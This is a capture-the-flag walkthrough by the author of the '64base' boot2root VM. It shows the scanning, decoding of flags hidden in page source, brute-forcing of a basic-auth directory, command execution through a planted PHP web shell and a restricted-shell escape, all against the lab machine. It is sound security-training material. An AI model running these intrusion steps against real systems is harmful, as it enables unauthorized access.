The Complete Walkthrough - ȜӎŗgͷͼȜ

Lord Vader

Many of you have emailed both thanking me for creating this boot2root challenge, and asking for a full walkthrough in order to aid their learning. So, here is a complete and full walkthrough as I imagined people might have solved the challenge as I created it. This is not to say there aren’t other equally valid ways in which someone could approach and solve this boot2root challenge.

Anyway, I hope people had fun in their efforts battling the Dark Side. ;D

Contents:


Discovering the IP of the VM

So, after making sure the network adapter is set to share the same subnet as my Kali VM & booting up the VM in VirtualBox, I use the netdiscover command to find the IP Address:

[email protected]:~# netdiscover -r 172.16.0.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts
  
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 172.16.0.1      52:54:00:12:35:00      1      60  Unknown vendor
 172.16.0.2      52:54:00:12:35:00      1      60  Unknown vendor
 172.16.0.3      08:00:27:33:c6:5c      1      60  PCS Systemtechnik GmbH
 172.16.0.19     08:00:27:68:e7:f8      1      60  PCS Systemtechnik GmbH 
 

I Know Kali is using 172.16.0.3, so lets have a look at 172.16.0.19


Scanning For Open Ports

Next we use nmap to do a full port range scan for any open ports/services on 172.16.0.19

[email protected]:~# nmap 172.16.0.19 -p-

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-12-08 17:30 EST
Nmap scan report for 172.16.0.19
Host is up (0.00048s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
4899/tcp  open  radmin
62964/tcp open  unknown
MAC Address: 08:00:27:68:E7:F8 (Oracle VirtualBox virtual NIC)

We have discovered 4 open ports :D

However, don’t forget I described this challenge as “Designed To TROLL You!” troll

A quick banner grab of each of these apparent open services using the nc command reveals a bit more information

Port 22 (SSH?)

[email protected]:~# nc -nv 172.16.0.19 22
(UNKNOWN) [172.16.0.19] 22 (ssh) open
The programs included with the Fedora GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001

#

^C

Hmnnn, ;D

A root SSH session over netcat into a fedora system, last logged into in year 4025 from IP Address 010.101.010.001?

You got me! It’s a pure TROLL! I added it in just to make people smile tbh. troll

I expected here people may get drawn into trying to decipher some kind of cryptic clue or perceived StarWars reference.

A sensible approach would be to copy off all the words into a wordlist for use later for enumerating files/directories/usernames/password etc.

However as I just said, this one was just a Troll and nothing more. LOLZ

Port 80 (http?)

[email protected]:~# nc -nv 172.16.0.19 80
(UNKNOWN) [172.16.0.19] 80 (http) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 14 Dec 2016 22:03:42 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Tue, 06 Dec 2016 05:33:14 GMT
ETag: "1fdf-542f6bd9b68a0"
Accept-Ranges: bytes
Content-Length: 8159
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


A legitimate Apache webserver running on Debian.

We’ll come back to this shortly…

Port 4899 (radmin?)

[email protected]:~# nc -nv 172.16.0.19 4899
(UNKNOWN) [172.16.0.19] 4899 (radmin-port) open
sshhh! ssh! droids!























































So..

You found a way in then...

but, can you pop root?



                                           /~\
                                          |oo )    Did you hear that?
                                          _\=/_
                          ___            /  _  \
                         / ()\          //|/.\|\\
                       _|_____|_        \\ \_/  ||
                      | | === | |        \|\ /| ||
                      |_|  O  |_|        # _ _/ #
                       ||  O  ||          | | |
                       ||__*__||          | | |
                      |~ \___/ ~|         []|[]
                      /=\ /=\ /=\         | | |
      ________________[_]_[_]_[_]________/_]_[_\_________________________


^C


OK, we have some ASCII art and some possible clues/red herrings. As you can see there is a line of text at the top of the file (sshhh! ssh! droids!) followed by 55 empty newlines. Clearly, I designed this to hide the 1st line of the file beyond the limit of most people’s terminal spool. (Sneaky I know :D)

Once again, The words can be saved off into a wordlist for use later perhaps.

Only Mildly Troll like in this case.

Port 62964 (unknown?)

[email protected]:~# nc -nv 172.16.0.19 62964
(UNKNOWN) [172.16.0.19] 62964 (?) open
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3

^C

A legit SSH (OpenSSH_6.7p1) Server is running here

I expect people used the usual tools such as hydra & ncrack here to try and brute force various user/password combos based on StarWars character names with a wordlist of StarWars scripts/trivia text.

Again, a sensible approach, but in this case it will give you nothing. (I am evil yes ;D) troll


A Deeper Look at The Website

Browsing to http://172.16.0.19/ we are presented with the ramblings of the dark lord himself.

A Dark Lord Must Explore

Hmnn.. dmlldyBzb3VyY2UgO0QK right in the middle of the landing page. What could that be I wonder?

[email protected]:~# echo dmlldyBzb3VyY2UgO0QK|base64 -d
view source ;D

View source it says…

OK, Lets pull down any html comments using the curl command combined with grep

[email protected]:~# curl http://172.16.0.19/|grep !
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  8159  100  8159    0     0  10.3M      0 --:--:-- --:--:-- --:--:-- 7967k
<!DOCTYPE html>
    <!-- Bootstrap Core CSS -->
    <!-- Theme CSS -->
    <!-- Custom Fonts -->
    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <![endif]-->
    <!-- Navigation -->
            <!-- Brand and toggle get grouped for better mobile display -->
            <!-- Collect the nav links, forms, and other content for toggling -->
            <!-- /.navbar-collapse -->
        <!-- /.container -->
    <!-- Page Header -->
    <!-- Set your background image for this header on the line below. -->
             <!--5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a-->
    <!-- Main Content -->
                <!-- Pager -->
    <!-- Footer -->
    <!-- jQuery -->
    <!-- Bootstrap Core JavaScript -->
    <!-- Contact Form JavaScript -->
    <!-- Theme JavaScript -->

That’s an awfully long string of numbers and lowercase letters.

Let’s see if we can decode it in any way.

[email protected]:~# echo 5a6d78685a7a4637546d705361566c59546d785062464a76545870566\
> 56c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5\
> a77596d316a4d454e6e5054313943673d3d0a|xxd -p -r
ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==

[email protected]:~# echo 5a6d78685a7a4637546d705361566c59546d785062464a76545870566\
56c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5\
a77596d316a4d454e6e5054313943673d3d0a|xxd -p -r|base64 -d
flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}

So it turned out to be hex data containing a base64 string then.

We just found flag1 flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}.

That was pretty easy! Right? Lets see what it’s value decodes to also.

[email protected]:~# echo 5a6d78685a7a4637546d705361566c59546d785062464a76545870566\
> 56c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5\
> a77596d316a4d454e6e5054313943673d3d0a|xxd -p -r|base64 -d|cut -d{ -f2|cut -d} -f1|base64 -d
64base:[email protected]@reL00K1ing4

Nice, we have what look like some creds 64base:[email protected]@reL00K1ing4.

But, Sadly… Work’ey No for SSH’ey :( troll

Oh well, saved for later I guess at this stage. ;D

Further enumeration of Darth Vader’s Blog reveals an interesting post he’s published.

A Dark Lord Must Explore

An entertaining read (full of clues and trolls indeed). troll

A section at the bottom of the wanted poster image looks like a possible clue.

A Dark Lord Must Explore

The image says:

IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377.

and the comment below it says:

Only respond if you are a real Imperial-Class BountyHunter

Red Herrings or Clues? You decide…

Noted down for later.


Automating Site Enumeration

So, we know there is quite a lot of very specific text contained within the content of the site. There are a few different things we can do from here. Let’s start with a bit more scanning.

Website Scanning

A commonly used tool for doing a basic vulnerability scan of a website is the command line tool nikto

lets give it a shot then…

[email protected]:~# nikto -host "http://172.16.0.19/" -Display -output
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.0.19
+ Target Hostname:    172.16.0.19
+ Target Port:        80
+ Start Time:         2016-12-14 23:32:04 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1fdf 0x542f6bd9b68a0 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/88888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
   
   ~~~ EXCESSIVE LINES OF CODE OMITTED HERE ~~~

+ "robots.txt" contains 429 entries which should be manually viewed.
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
- STATUS: Completed 1500 requests (~22% complete, 14 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 2000 requests (~29% complete, 15 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 2500 requests (~36% complete, 12 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /members/: This might be interesting...
+ OSVDB-3092: /order/: This might be interesting...
+ OSVDB-3092: /staff/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
- STATUS: Completed 3000 requests (~43% complete, 10 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 3500 requests (~50% complete, 9 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
+ OSVDB-3268: /manual/images/: Directory indexing found.
- STATUS: Completed 4000 requests (~58% complete, 7 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
+ OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
+ OSVDB-3092: /is/: This might be interesting... potential country code (Iceland)
+ OSVDB-3092: /no/: This might be interesting... potential country code (Norway)
+ OSVDB-3092: /to/: This might be interesting... potential country code (Tonga)
- STATUS: Completed 4500 requests (~65% complete, 6 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 5000 requests (~72% complete, 5 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 5500 requests (~79% complete, 3 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 6000 requests (~87% complete, 2 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 6500 requests (~94% complete, 1 seconds left): currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 7000 requests: currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
- STATUS: Completed 8000 requests: currently in plugin 'Nikto Tests'
- STATUS: Running average: Not enough data.
+ 8115 requests: 0 error(s) and 434 item(s) reported on remote host
+ End Time:           2016-12-14 23:32:19 (GMT0) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


As you can see, this generates alot of output with many false positives.

"robots.txt" contains 429 entries which should be manually viewed troll

YIKES! How might we “separate the wheat from the chaff” so to speak.

let’s try another approach.

Now, earlier on we found what look like a set of credentials. However, they didn’t work for SSH.

If we consider the way they’re presented as a colon separated string, they look like possible ‘basic auth’ creds. 64base:[email protected]@reL00K1ing4

Maybe there is a login page somewhere hidden on the web server. We can easily automate finding such a login page using the command line web brute force enumeration tool dirb.

If we know we are only interested in server responses indicating a login portal we can combine it with grep to filter the results to show us only the ones that contain any 401 Unauthorized response codes.

[email protected]:~# dirb http://172.16.0.19/ |grep CODE:401
+ http://172.16.0.19/admin (CODE:401|SIZE:458)

We have a hit, and visiting it in the browser confirms it’s asking for credentials.

admin login

Let’s test the creds from flag1 using curl

[email protected]:~# curl -u '64base:[email protected]@reL00K1ing4'\
> -s http://172.16.0.19/admin/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested.  Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
<hr>
<address>Apache/2.4.10 (Debian) Server at 172.16.0.19 Port 80</address>
</body></html>

But, still no dice… troll

… Remembering back, There was a hint in the blog post about a “Secret 5h377” and some other info.

It’s certainly sensible to try to enumerate in a much more targeted way.

Here I expect people may have started parsing and processing StarWars movie scripts and such like to create custom word lists for use in cracking the SSH login and enumeration of the website. I could have done that to you. But, I promise, all the clues and information are self contained in the VM itself.

With this in mind lets move on…


Creating a Custom Wordlist

In this case we’ll keep it super simple by recursively copying all content from the blog, including the robots.txt, HTML and JavaScript. Using wget with the right flags allows us to dump this all into a single file. Then we can use the tools html2dic and sort to clean it up and convert it to a useable wordlist.

[email protected]:~# wget http://172.16.0.19/ -rq -O 64base-html.out
[email protected]:~# ls -al 64base-html.out 
-rw-r--r-- 1 root root 1869208 Dec  6 01:39 64base-html.out

[email protected]:~# html2dic 64base-html.out | sort -u > 64base-html.dict
[email protected]:~# wc -l 64base-html.dict 
12845 64base-html.dict

Now we can use this list to re-try the web login enumeration using dirb once more.

[email protected]:~# dirb http://172.16.0.19/ 64base-html.dict | grep CODE:401
+ http://172.16.0.19/admin (CODE:401|SIZE:458)
+ http://172.16.0.19/Imperial-Class (CODE:401|SIZE:458)


Bingo! Imperial-Class the creds now work and we are granted access to a new area of the site.

Imperial-Class

But, We are presented with some kind of custom error message.

pulling down the source code using curl reveals a bit more info once again.

[email protected]:~# curl -u '64base:[email protected]@reL00K1ing4'\
> -s http://172.16.0.19/Imperial-Class/
<!DOCTYPE html>
<html lang="en">
<body bgcolor=#000000><font color=#cfbf00>
<title>64base - login</title>
<h3>[☠] ERROR: incorrect path!.... TO THE DARK SIDE!</h3>
<!-- don't forget the BountyHunter login -->

Another clue. Where could the BountyHunter Login be. Again, remembering back to the clues in the blog post, there was a comment beneath the wanted poster image.

“Only respond if you are a real Imperial-Class BountyHunter”

After not too long this should lead us to:

http://172.16.0.19/Imperial-Class/BountyHunter/

Imperial-Class

Oh My, yet another login TROLLOLLOLOLOOL! troll

Having a look at the page source initially reveals very little

Imperial-Class

The login button looks like it is passing the creds entered in the form to a php file that redirects us back to index.php ./login.php

viewing the response using Firefox’s network profiling tool shows us as much

Imperial-Class

However, this is where we need to start paying close attention to how the form functions. As many of you may have noticed in the url bar, we started off in the default root of the /BountyHunter/ web directory. Now we are directly accessing /BountyHunter/index.php.

At first glance this looks the same. But it’s not when we view the source of the response. troll

Imperial-Class

Goody Gum Drops, more alpha numeric strings like the one we found that contained flag1. Lets “string” em’ all together (pun intended) and try to decode it:

[email protected]:~# echo 5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756\
> 584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32\
> 52714d544a54626d51315a45566157464655614446525557383966516f3d0a\
> |xxd -p -r|base64 -d
flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}

We have flag2 at last! flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}

Let’s decode its contents too then.

[email protected]:~# echo aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=|base64 -d
https://www.youtube.com/watch?v=vJwytFWA8uA

A video clue this time.

Imperial-Class

A little hint to use burp.

Let’s have another look at the login form functionality using that then, first making sure to intercept the server responses.

Imperial-Class

Imperial-Class

Coolio, we now have flag3!

See, the interesting thing is, that while we did use Firfox’s web developer tools to figure out how the login form seemed to work, the response of requesting login.php appeared blank because the browser was hitting the redirect and failing to render the plain text content within the script.

Of course, we didn’t really need burp to grab this flag. we already knew it existed in the /Imperial-Class/BountyHunter/ web directory and could easily have just grabbed it too with curl.

so lets use that to grab flag3 and decode it.

[email protected]:~# curl -u '64base:[email protected]@reL00K1ing4'\
> -s http://172.16.0.19/Imperial-Class/BountyHunter/login.php\
> | grep flag|cut -d{ -f2|cut -d} -f1|base64 -d
53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id


The Secret 5h377

“Secret 5h377” Let’s try it out.

Imperial-Class

Hmnn, it has the look of a php web-shell, but trying a few different commands other than id yeilds nothing.

However, remember the clue from the wanted poster image?

IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377

Let’s try that instead then.

Imperial-Class

Sweet! We are executing some system commands via php.

So now we have flag4 and the apparent ability to execute commands as the 64base user account. Interesting.

From here there is more than one way to proceed (as of ver:1.0.1).

NOTE: Originally, the challenge had the web directory permissions set in such a way as to restrict the ability to write files in the web path as well as to disalow execution of certain binary files. I decided to allow these in version 1.0.1 of the challenge in order to make it a little easier from this point on

So, let’s decode flag4 then.

[email protected]:~# echo NjRiYXNlOjY0YmFzZTVoMzc3Cg==|base64 -d
64base:64base5h377

Some more creds. but they don’t work for anything. troll

Hmnn, what’s the challenge called? and what tool does it keep relying on?

Yup, base64

Let’s use that to encode the password from flag4 64base5h377.

[email protected]:~# echo 64base5h377|base64
NjRiYXNlNWgzNzcK

Which works for SSH.

[email protected]:~# ssh [email protected] -p 62964
[email protected]'s password: 

Last login: Sat Dec 17 15:13:16 2016 from 172.16.0.3
[email protected]:~$

But, it’s a restricted shell

[email protected]:~$ id
-rbash: id: command not found
[email protected]:~$ netstat
-rbash: netstat: command not found
[email protected]:~$ ls -al
well_done_:D
[email protected]:~$ pwd
/64base
[email protected]:~$ cat well_done_\:D
 _           
 \\                                                       
  \\_          _.-._                
   X:\        (_/ \_)         
   \::\       ( ==  )          
    \::\       \== /          
   /X:::\   .-./`-'\.--.       
   \\/\::\ / /     (    l      
    ~\ \::\ /      `.   L.      
      \/:::|         `.'  `     
      /:/\:|         `(    `.    
      \/`-'`.          >    )     
             \       //  .-'     
              |     /(  .'        
              `-..-'_ \  \        
              __||/  \ `-'          
             / _ \ #  |            
            |  #  |#  |           
         LS |  #  |#             
                                 
    BioTronics Security Droid 
[email protected]:~$ 

Breaking Out Of Jail

Some commands are not recognised and some just print ascii art of imperial droids and vehicles! troll

[email protected]:~$ less  well_done_\:D
               .------.
              .'::::::' `.
              |: __   __ |
              | <__] [__>|     
              `-.  __  .-'                       
                | |==| |                      
                | |==| |                     
             __.`-[..]-'\__             
      _.--:""      ||   _``:::--._   
     | |  |.      .:'  (o) ::|  | |       
     |_|  |::..  // _       :|  |_|              
      ===-|:''' // /.\       |-===\       
      |_| `:___//_|[ ]|_____.' |_| )        
      l=l   |\V/_=======_==|   l=l/          
    .-l=l   |`'==/=="======|  /|.:        
    | l l   |=="======\=_==| `-T l      
    `.l_l   |==============|   l_l        
      [_]  [__][__]____[_]__]  [_]     
      \\\ .'.--.- --   --. .`. |||.
      \\\\| |  |    |    |  || |||| 
       \\\\   .'    |    |  |`.||||
        \\\\  | LS  |    `.   |||||

              Medical Droid

[email protected]:~$ grep -v '¬' well_done_\:D
                ________
           _,.-Y  |  |  Y-._
       .-~"   ||  |  |  |   "-.
       I" ""=="|" !""! "|"[]""|     _____
       L__  [] |..------|:   _[----I" .-{"-.
      I___|  ..| l______|l_ [__L]_[I_/r(=}=-P
     [L______L_[________]______j~  '-=c_]/=-^
      \_I_j.--.\==I|I==_/.--L_]
        [_((==)[`-----"](==)j
           I--I"~~"""~~"I--I
           |[]|         |[]|                
           l__j         l__j                             
           |!!|         |!!|                           
           |..|         |..|                            
           ([])         ([])                         
           ]--[         ]--[                             
           [_L]         [_L]  -Row                        
          /|..|\       /|..|\                   
         `=}--{='     `=}--{='              
        .-^--r-^-.   .-^--r-^-.             
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
          ->Imperial AT-AT<- 

[email protected]:~$ find / -name flag5*
           __________        
       _xXXXXXXXXXXXXXXXx_
     .-         |         -.         
   _/___________|___________\_
  /             |       __    \
 / _____________|      /__\    \
/               |      \__/     \    
|               |               |      
 HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH    
|           |   |  ___   ___    |       
\           |   | |== | |==/    /         
 \__________|   | |__| |__/    /      
  \_________|___|_____________/ 
    \           |      /    / 
     `-_________|_____/___-'
            \. \|/ ./
              `-+-'
                I
               [ ]
       LS   |==| |==]]
               `-'

   Cybot Galactica's AC1 "Spy-Eye"
         Surveillance Droid
                            
[email protected]:~$ python -V
           ____
          / ___\
         |: =O =O
         |:: __ |
          \_/LLL\
    __ __./:__:\.__ __
   (%%i \ |<__>| / i%%)
   |--|:/\/ :: \/\:|--|
   |  |:  :====:  :|  |
  .':.'Y-" |::| "-Y`.:`.
  |__| | : |__|.-.| |__|
  (%%) | : /++\`-'! (%%)
   \  \|n._\++/_.n| /  /
    \ xT::::--::::T/  /
     \Xl-. `""' .-lXX'
       |: \    / :|
       |:  i--i  :|
       |:  |  |  :| LS
       |___|  |__;|
       P%%%Y  P%%%Y
       b%%%d  b%%%d   B4 Bodyguard Droid
       |   |  |   |     - Front View -

[email protected]:~$ perl
          ,------.._
         (      o  o)
        _.`--------'
      .~  ~.   . `-.-~~~-.___      ____
      (     )   \       \    ~~~~~~ .--'
    .-~    /     ) ..___.-----------~
   /     > `-._  |/
  (      \     ~~--._
   `-.    \   //     ~~--.
      `-.  ~-.\\ /~-._  /X\
         `-=-._:=--. / |XOX|
     LS    |  |     ~-._\X/
         .--.-~~-.
        / ++| xx |   B-BD1 Battle Droid
       / ++/| xx |     - Side View -
[email protected]:~$ ruby

             _____
         ___/O   O\____
        / O        O   \
        \______________/
   -===|____\///\\\/_____
       \----------------/
        \______________/  \/
         /\__________/    //
  >=o\  // //\\   || \\  //
     \\o/ //  \o  ||  \o//
         //    || ||
     /o==o     |o \o==o   LS
    //         //     \\
    /\        //       /\   Arakyd Viper Probe Droid
              /\                 - Front View -

[email protected]:~$

Lets try to see what we are able to do.

[email protected]:~$ cd /
-rbash: cd: restricted


Not cd /

[email protected]:~$ ls -al /
well_done_:D

Not ls -al /

let’s try the obvious then.

[email protected]:~$ base64 well_done_\:D|base64 -d
sshhh! ssh! droids!























































So..

You found a way in then...

but, can you pop root?



                                           /~\
                                          |oo )    Did you hear that?
                                          _\=/_
                          ___            /  _  \
                         / ()\          //|/.\|\\
                       _|_____|_        \\ \_/  ||
                      | | === | |        \|\ /| ||
                      |_|  O  |_|        # _ _/ #
                       ||  O  ||          | | |
                       ||__*__||          | | |
                      |~ \___/ ~|         []|[]
                      /=\ /=\ /=\         | | |
      ________________[_]_[_]_[_]________/_]_[_\_________________________

It’s the radmin port clue we grabbed at the start.

Interesting.

Let’s look at our environment

[email protected]:~$ env
TERM=xterm-256color
SHELL=/bin/rbash
SSH_CLIENT=172.16.0.3 60442 62964
SSH_TTY=/dev/pts/0
USER=64base
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
MAIL=/var/mail/64base
PATH=/var/alt-bin
PWD=/64base
LANG=en_GB.UTF-8
GCC_COLORS=error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01
SHLVL=1
HOME=/64base
LANGUAGE=en_GB:en
LOGNAME=64base
SSH_CONNECTION=172.16.0.3 60442 172.16.0.19 62964
_=/var/alt-bin/env

A custom PATH!

We can list out all the files in that path with the built in echo command

[email protected]:~$ echo $PATH/*
/var/alt-bin/awk /var/alt-bin/base64 /var/alt-bin/cat /var/alt-bin/dircolors /var/alt-bin/droids /var/alt-bin/egrep /var/alt-bin/env /var/alt-bin/fgrep /var/alt-bin/file /var/alt-bin/find /var/alt-bin/grep /var/alt-bin/head /var/alt-bin/less /var/alt-bin/ls /var/alt-bin/more /var/alt-bin/perl /var/alt-bin/python /var/alt-bin/ruby /var/alt-bin/tail

Awesome, now we can see all the executables we have access to.

OH, what is /var/alt-bin/droids ?

And, when we run it.

[email protected]:~$ droids

Imperial-Class

ARGHH, our circuits are being jammed! But, luckily we can escape it with CTRL C

So..

You found a way in then...

but, can you pop root?



                                           /~\
                                          |oo )    Did you hear that?
                                          _\=/_
                          ___            /  _  \
                         / ()\          //|/.\|\\
                       _|_____|_        \\ \_/  ||
                      | | === | |        \|\ /| ||
                      |_|  O  |_|        # _ _/ #
                       ||  O  ||          | | |
                       ||__*__||          | | |
                      |~ \___/ ~|         []|[]
                      /=\ /=\ /=\         | | |
      ________________[_]_[_]_[_]________/_]_[_\_________________________

[email protected]:~$

Urghhh? What just happened then? Well. If we check our path now and also try to traverse directories and execute commands that were restricted before we can see we’ve broken out of the jail shell.

[email protected]:~$ echo $PATH
/var/alt-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[email protected]:~$ /bin/ls -al
total 20
drwxr-xr-x  2 root root 4096 Dec  6 03:32 .
drwxr-xr-x 22 root root 4096 Dec  6 03:00 ..
-rw-r--r--  1 root root 3602 Dec  6 04:39 .bashrc
-rw-r--r--  1 root root  176 Dec  7 17:18 .profile
---S---r-x  1 root root  819 Dec  6 05:05 well_done_:D
[email protected]:~$ /bin/ls -al /
total 84
drwxr-xr-x 22 root root  4096 Dec  6 03:00 .
drwxr-xr-x 22 root root  4096 Dec  6 03:00 ..
drwxr-xr-x  2 root root  4096 Dec  6 03:32 64base
drwxrwxr-x  2 root root  4096 Dec  6 05:23 bin
drwxr-xr-x  3 root root  4096 Nov 28 15:47 boot
drwxr-xr-x 16 root root  2920 Dec 17 18:50 dev
drwxr-xr-x 88 root root  4096 Dec 17 20:42 etc
drwxr-xr-x  3 root root  4096 Nov 28 15:47 home
lrwxrwxrwx  1 root root    29 Nov 28 15:39 initrd.img -> /boot/initrd.img-3.16.0-4-586
drwxr-xr-x 14 root root  4096 Nov 28 16:42 lib
drwx------  2 root root 16384 Nov 28 15:38 lost+found
drwxr-xr-x  3 root root  4096 Nov 28 15:38 media
drwxr-xr-x  2 root root  4096 Nov 28 15:38 mnt
drwxr-xr-x  3 root root  4096 Nov 29 03:13 opt
dr-xr-xr-x 75 root root     0 Dec 17 18:50 proc
drwx------  3 root root  4096 Dec  7 17:16 root
drwxr-xr-x 16 root root   580 Dec 17 18:50 run
drwxr-xr-x  2 root root  4096 Nov 28 15:47 sbin
drwxr-xr-x  2 root root  4096 Nov 28 15:38 srv
dr-xr-xr-x 12 root root     0 Dec 17 18:50 sys
drwxrwxrwt  7 root root  4096 Dec 17 20:42 tmp
drwxr-xr-x 10 root root  4096 Nov 28 15:38 usr
drwxr-xr-x 13 root root  4096 Nov 30 00:19 var
lrwxrwxrwx  1 root root    25 Nov 28 15:39 vmlinuz -> boot/vmlinuz-3.16.0-4-586
